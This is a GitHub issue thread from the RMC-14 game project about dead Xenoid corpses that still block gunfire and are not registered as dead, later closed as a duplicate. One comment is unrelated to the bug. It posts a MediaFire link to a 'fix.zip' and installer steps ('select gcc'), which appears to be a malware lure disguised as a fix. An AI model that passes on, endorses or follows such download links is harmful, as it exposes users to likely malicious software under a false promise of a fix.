### ISSUE TITLE
Can't shoot over dead Xenoid corpses

### ISSUE THREAD

**Issue by EpicJoston** [RMC-14/RMC-14#3831]
## Description
Xenoids when killed don't register as dead. They register as "catatonic" or "soul has departed" and thus still fully block bullets even if you aim past them.

**Reproduction**
Kill a Xenoid, try to shoot over it. Also inspect the corpse and notice that it doesn't identify as dead.

**Screenshots**
No screenshots I noticed it in a round that then crashed.

**Additional context**
Might be because of server issues and not anything to do with the game.

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Dutch-VanDerLinde** [comment]
dupe issue #3826

**Comment by Vermidia** [comment]
dupe, probably fixed? If not I'll open the old one
